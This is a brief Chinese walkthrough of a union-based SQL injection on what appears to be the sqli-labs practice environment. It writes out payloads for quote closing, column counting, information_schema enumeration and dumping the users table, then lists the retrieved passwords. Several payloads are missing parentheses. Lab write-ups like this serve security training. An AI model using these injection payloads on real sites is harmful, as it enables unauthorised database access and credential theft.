?id=1 and 1=1发现1=2的时候没有进行报错,有两种可能,一种是不能注入,第二种是字符型可以通过对字符型里面的''进行闭合,输入'and 1=1--+发现在1=2的情况下出现了报错,说明还是可以进行注入的,
'order by(--+来拆解一下有多少个显示字段,输入4发现没有回显,修改为3发现有回显,说明有三个回显字段
'union select 1,2,3--+ 因为有三个显示字段,所以查询一下显示位,因为我们要显示我们输入的1,2,3.所以要把服务器想要显示的让他报错将id=1修改为-1,发现只有2和3,有回显
数据库版本:version( 5.7.26
database( security
'union select 1,group_concat(table_name,3 from information_schema.tables where table_schema='security'--+
查询完表名之后就要去查询他的列名,一共有四个表名,所以我们就要去挨个查询,去得到他的敏感信息,因为要查询列名,所以就要把查询的表名切换为列名,然后来自于表名下所有的列,这些来自于表名所以后面有要改搜索到的表名,一共有四个表名,就要去挨个去搜索,
得到的列名总共有 id,email_id id,referer,ip_address id,uagent,ip_address,username
union select 1,group_concat(username,group_concat(password from users
因为username,password是在users 这个表里面查询出来的,就要去这个表里面去查询
密码Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4,admin5
##本文为原创文章,转载请附上原文出处链接及本声明。